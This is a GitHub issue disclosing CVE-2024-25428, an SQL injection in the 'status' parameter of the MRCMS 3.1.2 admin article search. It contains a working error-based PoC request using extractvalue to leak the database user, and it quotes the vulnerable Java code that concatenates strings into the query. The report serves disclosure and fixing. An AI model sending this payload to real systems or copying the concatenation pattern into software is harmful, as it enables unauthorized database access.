search

wuweiit / mushroom

MRCMS 是一款基于Java的动态内容管理系统
http://cms.yl-blog.com
MIT License
217 stars 183 forks source link

MRCMS 3.1.2 exists SQL injection vulnerability #19

Open xia0chensec opened 8 months ago

xia0chensec commented 8 months ago

[The name of an affected Product]

MRCMS

[The affected or fixed version]

v3.1.2

[CVE ID] CVE-2024-25428

[Vulnerability Type]

SQL Injection

[Vulnerability Description]

MRCMS v3.1.2 is vulnerable to SQL Injection via the status parameter

[Vulnerability details]

The vulnerability exists: http://localhost:8080/admin/article.do?cid=1&did=0&status=1&keyword=1&currentPageNo=1&pageSize=20

1.Select content->File management

2.Click the search button image

SQL injection exists in status parameter

POC

GET /admin/article.do?cid=1&did=0&status=1+and+extractvalue(1,concat(0x7e,(select+user()),0x7e))&keyword=1123&currentPageNo=1&pageSize=20 HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost:8080/admin/index.do
Cookie: JSESSIONID=AD318CA555923823E93DC03659C2B5C0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

image

code discovery

Code path: MRCMS\src\main\java\org\marker\mushroom\service\impl\ArticleService.java

public Page find(int currentPageNo, int pageSize, Map<String,Object> condition) {
        String keyword = (String) condition.get("keyword");
        String status = (String) condition.get("status");
        int cid = (Integer)condition.get("cid");
        int did = (Integer)condition.get("did");
        int userGroupId = (Integer)condition.get("userGroupId");
//      try {
//          keyword = new String(keyword.getBytes("ISO-8859-1"),"utf-8");
//      } catch (UnsupportedEncodingException e) {
//          e.printStackTrace();
//      }
        String prefix = config.getPrefix();

        String sql = "select a.id,a.title, a.author,a.views,a.status, a.time, concat('/cms?type=article','&id=',CAST(a.id as char),'&time=',DATE_FORMAT(a.time,'%Y%m%d'))  url, c.name as cname ,'article' model, a.stick from "+config.getPrefix()+"article as a "
                + "left join "+prefix+"channel c on c.id = a.cid ";

        sql +=  "where a.status in ("+status+") ";
        if(userGroupId != 1){
            sql += " and a.cid in (select cid from "+prefix+"user_group_channel where gid = "+userGroupId+") ";
        }

In this code, the SQL query string is built through string concatenation, and there is a potential SQL injection risk at the status parameter